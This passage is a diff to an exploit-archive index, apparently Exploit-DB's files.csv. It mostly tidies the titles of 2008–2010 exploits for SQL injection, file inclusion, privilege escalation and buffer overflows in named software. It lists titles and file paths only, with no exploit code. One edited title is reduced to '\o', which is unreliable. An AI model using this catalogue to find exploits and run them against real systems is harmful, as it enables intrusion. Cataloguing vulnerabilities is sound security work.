Inclusion",2008-06-26,"CWH Underground",php,webapps,0 +5940,platforms/php/webapps/5940.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion",2008-06-26,"CWH Underground",php,webapps,0 5941,platforms/php/webapps/5941.txt,"polypager <= 1.0rc2 - (SQL/XSS) Multiple Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0 5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax <= 4.42 - (category) SQL Injection",2008-06-26,boom3rang,php,webapps,0 5944,platforms/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0 @@ -5574,7 +5574,7 @@ id,file,description,date,author,platform,type,port 5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,CraCkEr,php,webapps,0 5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts Nms Insecure Cookie Handling",2008-06-26,"Virangar Security",php,webapps,0 5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 - (params.php) Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0 -5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro Local File Inclusion (1st)",2008-06-26,StAkeR,php,webapps,0 +5956,platforms/php/webapps/5956.txt,"\o - Local File Inclusion (1st)",2008-06-26,StAkeR,php,webapps,0 5957,platforms/php/webapps/5957.txt,"otmanager CMS 24a - (LFI/XSS) Multiple Vulnerabilities",2008-06-27,"CWH Underground",php,webapps,0 5958,platforms/php/webapps/5958.txt,"w1l3d4 philboard 1.2 - (blind sql/XSS) Multiple Vulnerabilities",2008-06-27,Bl@ckbe@rD,php,webapps,0 5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0 @@ -5718,7 +5718,7 @@ id,file,description,date,author,platform,type,port 6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - (show.php) Remote SQL Injection",2008-07-20,Mr.SQL,php,webapps,0 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow PoC",2008-07-21,"Guido Landi",windows,dos,0 6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0 -6105,platforms/asp/webapps/6105.pl,"HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0 +6105,platforms/asp/webapps/6105.pl,"HRS Multi - (picture_pic_bv.asp key) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0 6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 - (map file) Local Arbitrary Code Execution Exploit (Perl)",2008-07-21,"Guido Landi",windows,local,0 6107,platforms/php/webapps/6107.txt,"Interact E-Learning System 2.4.1 - (help.php) LFI Vulnerabilities",2008-07-21,DSecRG,php,webapps,0 6108,platforms/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Remote Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0 @@ -6402,7 +6402,7 @@ id,file,description,date,author,platform,type,port 6834,platforms/windows/dos/6834.c,"vicFTP 5.0 - (LIST) Remote Denial of Service Exploit",2008-10-24,"Alfons Luja",windows,dos,0 6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - (download id) Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0 6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0 -6837,platforms/php/webapps/6837.txt,"Kasra CMS (index.php) Multiple SQL Injection Vulnerabilities",2008-10-25,G4N0K,php,webapps,0 +6837,platforms/php/webapps/6837.txt,"Kasra CMS - (index.php) Multiple SQL Injection Vulnerabilities",2008-10-25,G4N0K,php,webapps,0 6838,platforms/windows/dos/6838.rb,"PumpKIN TFTP Server 2.7.2.0 - Denial of Service Exploit (Metasploit)",2008-10-25,"Saint Patrick",windows,dos,0 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - (gotourl.php id) SQL Injection",2008-10-26,"Hussin X",php,webapps,0 6840,platforms/windows/remote/6840.html,"PowerTCP FTP module Multiple Technique Exploit (SEH/HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0 @@ -7984,7 +7984,7 @@ id,file,description,date,author,platform,type,port 8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro (display) Blind SQL Injection",2009-04-17,"Hussin X",php,webapps,0 8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling",2009-04-17,"Hussin X",php,webapps,0 8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Auth Bypass) SQL Injection",2009-04-17,HCOCA_MAN,php,webapps,0 -8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - < UDEV 1.4.1 Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0 +8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV < 1.4.1 Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0 8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0 8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - (profile) Shell Upload",2009-04-20,JosS,php,webapps,0 @@ -8061,7 +8061,7 @@ id,file,description,date,author,platform,type,port 8553,platforms/php/webapps/8553.htm,"Teraway LinkTracker 1.0 - Remote Password Change Exploit",2009-04-27,"ThE g0bL!N",php,webapps,0 8554,platforms/windows/remote/8554.py,"Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit",2009-04-27,His0k4,windows,remote,80 8555,platforms/php/webapps/8555.txt,"ABC Advertise 1.0 Admin Password Disclosure",2009-04-27,SirGod,php,webapps,0 -8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.x (<= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10) (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0 +8556,platforms/linux/remote/8556.c,"Linux Kernel <= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0 8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 - (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0 8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injection Vulnerabilities",2009-04-28,YEnH4ckEr,php,webapps,0 8559,platforms/php/webapps/8559.c,"webSPELL <= 4.2.0d - Local File Disclosure Exploit (.c Linux)",2009-04-28,StAkeR,php,webapps,0 @@ -8252,7 +8252,7 @@ id,file,description,date,author,platform,type,port 8750,platforms/php/webapps/8750.txt,"PHP Article Publisher Arbitrary Auth Bypass",2009-05-20,"ThE g0bL!N",php,webapps,0 8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 - (forumid) Remote Blind SQL Injection",2009-05-20,snakespc,php,webapps,0 8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Remote Arbitrary Remove Projects/Tasks Vulnerabilities",2009-05-20,YEnH4ckEr,php,webapps,0 -8753,platforms/osx/remote/8753.txt,"Mac OS X - Java applet Remote Deserialization Remote PoC (Updated)",2009-05-20,"Landon Fuller",osx,remote,0 +8753,platforms/osx/remote/8753.txt,"Mac OS X - Java applet Remote Deserialization Remote PoC (2)",2009-05-20,"Landon Fuller",osx,remote,0 8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0 8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - (Auth Bypass) SQL Injection",2009-05-21,Striker7,php,webapps,0 8756,platforms/asp/webapps/8756.txt,"asp inline corporate calendar - (SQL/XSS) Multiple Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0 @@ -8268,7 +8268,7 @@ id,file,description,date,author,platform,type,port 8767,platforms/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow PoC",2009-05-22,n00b,windows,dos,0 8769,platforms/php/webapps/8769.txt,"ZaoCMS (user_id) Remote SQL Injection",2009-05-22,Qabandi,php,webapps,0 8770,platforms/windows/local/8770.py,"Winamp <= 5.55 - (MAKI script) Universal Seh Overwrite Exploit",2009-05-22,His0k4,windows,local,0 -8771,platforms/php/webapps/8771.htm,"ZaoCMS (user_updated.php) Remote Change Password Exploit",2009-05-22,"ThE g0bL!N",php,webapps,0 +8771,platforms/php/webapps/8771.htm,"ZaoCMS - (user_updated.php) Remote Change Password Exploit",2009-05-22,"ThE g0bL!N",php,webapps,0 8772,platforms/windows/local/8772.pl,"Winamp <= 5.55 - (MAKI script) Universal Integer Overflow Exploit",2009-05-22,"Encrypt3d.M!nd ",windows,local,0 8773,platforms/php/webapps/8773.txt,"ZaoCMS (PhpCommander) - Arbitrary Remote File Upload",2009-05-22,Qabandi,php,webapps,0 8774,platforms/php/webapps/8774.htm,"Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit",2009-05-22,G4N0K,php,webapps,0 @@ -8290,7 +8290,7 @@ id,file,description,date,author,platform,type,port 8790,platforms/php/webapps/8790.pl,"cpCommerce 1.2.x - GLOBALS[prefix] Arbitrary File Inclusion Exploit",2009-05-26,StAkeR,php,webapps,0 8791,platforms/php/webapps/8791.txt,"WordPress Plugin Lytebox - (wp-lytebox) Local File Inclusion",2009-05-26,TurkGuvenligi,php,webapps,0 8792,platforms/php/webapps/8792.txt,"Webradev Download Protect 1.0 - Remote File Inclusion Vulnerabilities",2009-05-26,asL-Sabia,php,webapps,0 -8793,platforms/php/webapps/8793.txt,"eZoneScripts Hotornot2 Script (Admin Bypass) Multiple Remote Vulnerabilities",2009-05-26,"sniper code",php,webapps,0 +8793,platforms/php/webapps/8793.txt,"eZoneScripts Hotornot2 Script - (Admin Bypass) Multiple Remote Vulnerabilities",2009-05-26,"sniper code",php,webapps,0 8794,platforms/multiple/dos/8794.htm,"Mozilla Firefox (unclamped loop) Denial of Service Exploit",2009-05-26,"Thierry Zoller",multiple,dos,0 8795,platforms/php/webapps/8795.htm,"Ultimate Media Script 2.0 - Remote Change Content Vulnerabilities",2009-05-26,"ThE g0bL!N",php,webapps,0 8796,platforms/php/webapps/8796.htm,"Gallarific (user.php) Arbirary Change Admin Information Exploit",2009-05-26,TiGeR-Dz,php,webapps,0 @@ -8701,7 +8701,7 @@ id,file,description,date,author,platform,type,port 9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation Exploit",2009-07-21,"Jeremy Brown",windows,local,0 9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0 9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 (Auth Bypass) - SQL Injection",2009-07-21,n3w7u,php,webapps,0 -9226,platforms/php/webapps/9226.txt,"phpdirectorysource (XSS/SQL) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0 +9226,platforms/php/webapps/9226.txt,"phpdirectorysource - (XSS/SQL) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0 9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script - (url) Local File Disclosure",2009-07-21,Moudi,php,webapps,0 9228,platforms/windows/dos/9228.pl,"otsAV 1.77.001 - (.ofl) Local Heap Overflow PoC",2009-07-22,hack4love,windows,dos,0 9229,platforms/windows/local/9229.py,"WINMOD 1.4 - (.lst) Universal Buffer Overflow Exploit (SEH) (2)",2009-07-22,Dz_Girl,windows,local,0 @@ -8715,7 +8715,7 @@ id,file,description,date,author,platform,type,port 9240,platforms/windows/dos/9240.py,"OpenH323 Opal SIP Protocol Remote Denial of Service Exploit",2009-07-24,"Jose Miguel Esparza",windows,dos,0 9241,platforms/windows/dos/9241.py,"Ekiga 2.0.5 - (GetHostAddress) Remote Denial of Service Exploit",2009-07-24,"Jose Miguel Esparza",windows,dos,0 9242,platforms/windows/dos/9242.py,"WzdFTPD <= 8.0 - Remote Denial of Service Exploit",2009-07-24,"Jose Miguel Esparza",windows,dos,0 -9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum (SQL/XSS) Multiple Vulnerabilities",2009-07-24,Moudi,php,webapps,0 +9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - (SQL/XSS) Multiple Vulnerabilities",2009-07-24,Moudi,php,webapps,0 9244,platforms/php/webapps/9244.txt,"Joomla Extension UIajaxIM 1.1 JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0 9245,platforms/php/webapps/9245.pl,"PHP Live! 3.2.1/2 - (x) Remote Blind SQL Injection Exploit",2009-07-24,skys,php,webapps,0 9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0 @@ -8734,7 +8734,7 @@ id,file,description,date,author,platform,type,port 9259,platforms/php/webapps/9259.txt,"almond classifieds ads - (bSQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9260,platforms/php/webapps/9260.txt,"skadate dating - (RFI/LFI/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9261,platforms/php/webapps/9261.txt,"xoops celepar module qas - (bSQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 -9262,platforms/php/webapps/9262.txt,"garagesalesjunkie (SQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 +9262,platforms/php/webapps/9262.txt,"garagesalesjunkie - (SQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9263,platforms/php/webapps/9263.txt,"URA 3.0 - (cat) Remote SQL Injection",2009-07-27,"Chip d3 bi0s",php,webapps,0 9264,platforms/linux/dos/9264.py,"stftp <= 1.10 - (PWD Response) Remote Stack Overflow PoC",2009-07-27,sqlevil,linux,dos,0 9265,platforms/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 - Remote Buffer Overflow PoC",2009-07-27,"Jon Oberheide",linux,dos,0 @@ -8809,7 +8809,7 @@ id,file,description,date,author,platform,type,port 9335,platforms/php/webapps/9335.txt,"TT Web Site Manager 0.5 - (Auth Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0 9336,platforms/php/webapps/9336.txt,"SimpleLoginSys 0.5 - (Auth Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0 9337,platforms/php/webapps/9337.txt,"simplePHPWeb 0.2 - (files.php) Authentication Bypass",2009-08-03,SirGod,php,webapps,0 -9338,platforms/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher (bSQL-XSS) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 +9338,platforms/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher - (bSQL/XSS) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 9339,platforms/php/webapps/9339.txt,"Miniweb 2.0 Module Survey Pro - (bSQL/XSS) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 9340,platforms/php/webapps/9340.txt,"x10 media adult script 1.7 - Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - (Auth Bypass) Remote SQL Injection",2009-08-03,snakespc,php,webapps,0 @@ -8848,7 +8848,7 @@ id,file,description,date,author,platform,type,port 9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 - (.m3u) Universal Stack Overflow Exploit (SEH)",2009-08-06,Dr_IDE,windows,local,0 9376,platforms/windows/dos/9376.py,"jetAudio <= 7.5.5 plus vx (M3U/ASX/WAX/WVX) Local Crash PoC",2009-09-10,Dr_IDE,windows,dos,0 9377,platforms/windows/local/9377.pl,"A2 Media Player Pro 2.51 - (.m3u /m3l) Universal Local BoF Exploit (SEH)",2009-08-06,hack4love,windows,local,0 -9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster (Topic Delete/XSS) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0 +9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster - (Topic Delete/XSS) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0 9379,platforms/windows/local/9379.pl,"Playlistmaker 1.5 - (.M3U/M3L) Local Stack Overflow Exploit (seh)",2009-08-06,germaya_x,windows,local,0 9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - (showUid) Remote SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0 9381,platforms/windows/dos/9381.py,"Groovy Media Player 1.2.0 - (.m3u) Local Buffer Overflow PoC",2009-08-06,"opt!x hacker",windows,dos,0 @@ -8940,10 +8940,10 @@ id,file,description,date,author,platform,type,port 9474,platforms/php/webapps/9474.rb,"Traidnt UP 2.0 - Remote SQL Injection Exploit",2009-08-18,"Jafer Al Zidjali",php,webapps,0 9475,platforms/php/webapps/9475.txt,"asaher pro 1.0.4 - Remote Database Backup",2009-08-18,alnjm33,php,webapps,0 9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0 -9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0 +9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0 9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80 9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (5)",2009-08-24,"INetCop Security",linux,local,0 -9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0 +9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0 9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 - (gallery_id) Remote SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0 9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Auth Bypass) Insecure Cookie Handling",2009-08-24,Mr.tro0oqy,php,webapps,0 9483,platforms/windows/local/9483.pl,"Photodex ProShow Gold 4 - (.psh) Universal BoF Exploit XP SP3 (SEH)",2009-08-24,corelanc0d3r,windows,local,0 @@ -9007,7 +9007,7 @@ id,file,description,date,author,platform,type,port 9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit (1)",2009-08-31,"INetCop Security",linux,local,0 9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit (2)",2009-08-31,"Jon Oberheide",linux,local,0 9544,platforms/php/webapps/9544.txt,"Modern Script <= 5.0 - (index.php s) SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0 -9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - sock_sendpage() Local Root (PPC)",2009-08-31,"Ramon Valle",linux,local,0 +9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - 'sock_sendpage()' Local Root (PPC)",2009-08-31,"Ramon Valle",linux,local,0 9546,platforms/windows/dos/9546.pl,"Swift Ultralite 1.032 - (.M3U) Local Buffer Overflow PoC",2009-08-31,hack4love,windows,dos,0 9547,platforms/windows/dos/9547.pl,"SolarWinds TFTP Server <= 9.2.0.111 - Remote DoS Exploit",2009-08-31,"Gaurav Baruah",windows,dos,0 9548,platforms/windows/local/9548.pl,"Ultimate Player 1.56b (.m3u/upl) Universal Local BoF Exploit (SEH)",2009-08-31,hack4love,windows,local,0 @@ -10600,7 +10600,7 @@ id,file,description,date,author,platform,type,port 11585,platforms/php/webapps/11585.txt,"phpCDB <= 1.0 - Local File Include",2010-02-27,"cr4wl3r ",php,webapps,0 11586,platforms/php/webapps/11586.txt,"phpRAINCHECK <= 1.0.1 - SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 11587,platforms/php/webapps/11587.txt,"ProMan <= 0.1.1 - Multiple File Include",2010-02-27,"cr4wl3r ",php,webapps,0 -11588,platforms/php/webapps/11588.txt,"phpMySite (XSS/SQLi) Multiple Vulnerabilities",2010-02-27,Crux,php,webapps,0 +11588,platforms/php/webapps/11588.txt,"phpMySite - (XSS/SQLi) Multiple Vulnerabilities",2010-02-27,Crux,php,webapps,0 11589,platforms/asp/webapps/11589.txt,"Pre Classified Listings SQL Injection",2010-02-27,Crux,asp,webapps,0 11590,platforms/multiple/dos/11590.php,"Mozilla Firefox <= 3.6 - Denial of Service Exploit",2010-02-27,Ale46,multiple,dos,0 11592,platforms/php/webapps/11592.txt,"Scripts Feed Business Directory SQL Injection",2010-02-27,Crux,php,webapps,0 @@ -10653,7 +10653,7 @@ id,file,description,date,author,platform,type,port 11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0 11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - index.php (id) SQL Injection",2010-03-07,"Easy Laster",php,webapps,0 11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0 -11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.x / 1.7.x (<= 1.6.9p21 / <= 1.7.2p4) - Local Root Exploit",2010-03-07,kingcope,multiple,local,0 +11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit <= 1.6.9p21 / <= 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0 11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus 'V4.rgo' (id) news.php - SQL Injection",2010-03-08,"Easy Laster",php,webapps,0 11655,platforms/php/webapps/11655.txt,"TRIBISUR <= 2.0 - Local File Include",2010-03-08,"cr4wl3r ",php,webapps,0 @@ -10774,7 +10774,7 @@ id,file,description,date,author,platform,type,port 11780,platforms/php/webapps/11780.html,"Clain_TIger_CMS CSRF",2010-03-17,"pratul agrawal",php,webapps,0 11781,platforms/php/webapps/11781.html,"chilly_CMS CSRF",2010-03-17,"pratul agrawal",php,webapps,0 11782,platforms/php/webapps/11782.txt,"Joomla Component com_include SQL Injection",2010-03-17,"DevilZ TM",php,webapps,0 -11783,platforms/php/webapps/11783.txt,"Preisschlacht Multi Liveshop System SQL Injection (seite&aid) index.php",2010-03-17,"Easy Laster",php,webapps,0 +11783,platforms/php/webapps/11783.txt,"Preisschlacht Multi Liveshop System - SQL Injection (seite&aid) index.php",2010-03-17,"Easy Laster",php,webapps,0 11784,platforms/php/webapps/11784.txt,"PostNuke FormExpress Module Blind SQL Injection",2010-03-17,"Ali Abbasi",php,webapps,0 11785,platforms/php/webapps/11785.txt,"Joomla Component com_ckforms - Multiple Vulnerabilities",2010-03-17,"ALTBTA ",php,webapps,0 11786,platforms/windows/local/11786.txt,"Virtual PC Hypervisor Memory Protection",2010-03-17,"Core Security",windows,local,0 @@ -10795,7 +10795,7 @@ id,file,description,date,author,platform,type,port 11805,platforms/php/webapps/11805.txt,"phpscripte24 Niedrig Gebote Pro Auktions System II Blind SQL Injection",2010-03-18,"Easy Laster",php,webapps,0 11806,platforms/php/webapps/11806.txt,"nensor CMS 2.01 - Multiple Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0 11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Include Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0 -11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed (SQL/XSS) Multiple Vulnerabilities",2010-03-19,Red-D3v1L,php,webapps,0 +11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed - (SQL/XSS) Multiple Vulnerabilities",2010-03-19,Red-D3v1L,php,webapps,0 11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP server 1.0.0 - Pre-Authentication DoS (PoC)",2010-03-19,loneferret,windows,dos,21 11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21 11811,platforms/php/webapps/11811.txt,"phpscripte24 Preisschlacht Liveshop System SQL Injection (seite&aid) index.php",2010-03-19,"Easy Laster",php,webapps,0 @@ -10877,7 +10877,7 @@ id,file,description,date,author,platform,type,port 11899,platforms/php/webapps/11899.html,"AdaptCMS_Lite_1.5 2009-07-07",2010-03-27,ITSecTeam,php,webapps,0 11900,platforms/windows/local/11900.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - (.pls) Universal Stack BoF",2010-03-27,mat,windows,local,0 11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multi Local File Include",2010-03-27,ITSecTeam,php,webapps,0 -11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 multi file include",2010-03-27,ITSecTeam,php,webapps,0 +11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 - multi file include",2010-03-27,ITSecTeam,php,webapps,0 11904,platforms/php/webapps/11904.txt,"68kb multi Remote file include",2010-03-27,ITSecTeam,php,webapps,0 11905,platforms/php/webapps/11905.txt,"Simple Machines Forum (SMF) <= 1.1.8 - (avatar) Remote PHP File Execute PoC",2010-03-27,JosS,php,webapps,0 11906,platforms/php/webapps/11906.txt,"Uebimiau Webmail <= 2.7.2 - Multiple Vulnerabilities",2010-03-27,"cp77fk4r ",php,webapps,0 @@ -11365,7 +11365,7 @@ id,file,description,date,author,platform,type,port 12455,platforms/php/webapps/12455.txt,"Ucenter Projekt 2.0 - Insecure crossdomain (XSS)",2010-04-29,indoushka,php,webapps,0 12456,platforms/php/webapps/12456.txt,"chCounter indirect SQL Injection and XSS Vulnerabilities",2010-04-29,Valentin,php,webapps,0 12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 - (Win32) CSS Remote Denial of Service Exploit",2010-04-29,ITSecTeam,windows,dos,0 -12458,platforms/php/webapps/12458.txt,"Scratcher (SQL/XSS) Multiple Remote",2010-04-29,"cr4wl3r ",php,webapps,0 +12458,platforms/php/webapps/12458.txt,"Scratcher - (SQL/XSS) Multiple Remote",2010-04-29,"cr4wl3r ",php,webapps,0 12459,platforms/php/webapps/12459.txt,"ec21 clone 3.0 - (id) SQL Injection",2010-04-30,v3n0m,php,webapps,0 12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection",2010-04-30,v3n0m,php,webapps,0 12461,platforms/php/webapps/12461.txt,"JobPost - SQLi",2010-04-30,Sid3^effects,php,webapps,0 @@ -11443,7 +11443,7 @@ id,file,description,date,author,platform,type,port 12542,platforms/php/webapps/12542.rb,"phpscripte24 Shop System SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0 12543,platforms/php/webapps/12543.rb,"Alibaba Clone <= 3.0 (Special) - SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0 12544,platforms/php/webapps/12544.rb,"Alibaba Clone Diamond Version - SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0 -12545,platforms/php/webapps/12545.rb,"phpscripte24 Live Shopping Multi Portal System SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0 +12545,platforms/php/webapps/12545.rb,"phpscripte24 Live Shopping Multi Portal System - SQL Injection Exploit",2010-05-09,"Easy Laster",php,webapps,0 12546,platforms/windows/dos/12546.pl,"Hyplay 1.2.326.1 - (.asx) Local DoS Crash PoC",2010-05-10,"Steve James",windows,dos,0 12547,platforms/php/webapps/12547.txt,"e-webtech (new.asp?id=) SQL Injection",2010-05-10,protocol,php,webapps,0 12550,platforms/php/webapps/12550.pl,"Netvidade engine 1.0 - Multiple Vulnerabilities",2010-05-10,pwndomina,php,webapps,0 @@ -11478,7 +11478,7 @@ id,file,description,date,author,platform,type,port 12580,platforms/windows/remote/12580.txt,"miniwebsvr 0.0.10 - Directory Traversal/Listing Exploits",2010-05-12,Dr_IDE,windows,remote,0 12581,platforms/windows/remote/12581.txt,"Zervit Web Server 0.4 - Source 